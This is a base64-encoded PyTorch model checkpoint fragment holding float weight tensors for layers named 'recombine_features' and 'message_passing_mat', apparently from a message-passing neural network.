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JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4l